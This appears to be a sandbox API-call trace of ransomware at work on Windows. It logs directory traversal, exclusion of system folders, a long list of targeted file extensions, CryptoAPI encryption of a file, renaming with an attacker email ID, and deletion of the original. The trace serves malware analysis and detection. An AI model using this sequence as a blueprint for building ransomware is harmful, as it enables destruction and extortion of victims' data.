	[0172.680] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov"
	[0172.680] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\"
	[0172.680] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\"
	[0172.680] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*"
	[0172.680] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0172.681] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*") returned 89
	[0172.681] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.691] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*") returned 0x59
	[0172.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0172.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0172.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.692] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0172.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0172.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0172.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.693] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.694] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0172.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.694] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0172.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.694] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0172.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.694] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0172.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0172.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0172.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0172.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0172.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0172.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0172.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0172.698] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0172.698] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0172.698] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2173cb2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2173cb2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0172.698] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0172.699] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0172.699] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\"
	[0172.699] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml"
	[0172.699] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml") returned 97
	[0172.699] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.699] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml") returned 0x61
	[0172.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.700] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"
	[0172.700] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml") returned 97
	[0172.700] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.700] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.701] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.701] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.701] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.701] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.702] ReadFile (in: hFile=0x39c, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x243, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x189930*=0x243, lpOverlapped=0x0) returned 1
	[0172.705] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.705] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcbaa0) returned 1
	[0172.707] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.708] CryptCreateHash (in: hProv=0xfcbaa0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0172.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.708] CryptHashData (hHash=0xfb9670, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0172.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.708] CryptDeriveKey (in: hProv=0xfcbaa0, Algid=0x6610, hBaseData=0xfb9670, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8eb0) returned 1
	[0172.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.708] CryptEncrypt (in: hKey=0xfb8eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x243, dwBufLen=0x243 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x250) returned 1
	[0172.708] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.709] RtlMoveMemory (in: Destination=0xfdc7f0, Source=0xfdc138, Length=0x243 | out: Destination=0xfdc7f0) 
	[0172.709] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.709] CryptEncrypt (in: hKey=0xfb8eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc7f0*, pdwDataLen=0x1894dc*=0x243, dwBufLen=0x250 | out: pbData=0xfdc7f0*, pdwDataLen=0x1894dc*=0x250) returned 1
	[0172.710] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.710] CryptDestroyKey (hKey=0xfb8eb0) returned 1
	[0172.710] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.710] CryptDestroyHash (hHash=0xfb9670) returned 1
	[0172.710] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.710] CryptReleaseContext (hProv=0xfcbaa0, dwFlags=0x0) returned 1
	[0172.710] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.711] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.711] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.711] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0172.713] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0172.713] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0172.714] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc7f0*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc7f0*, lpNumberOfBytesWritten=0x189938*=0x250, lpOverlapped=0x0) returned 1
	[0172.717] CloseHandle (hObject=0x3a0) returned 1
	[0172.718] CloseHandle (hObject=0x39c) returned 1
	[0172.718] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml")) returned 1
	[0172.722] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml")) returned 0
	[0172.722] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2173cb2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2173cb2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0172.722] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0172.723] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
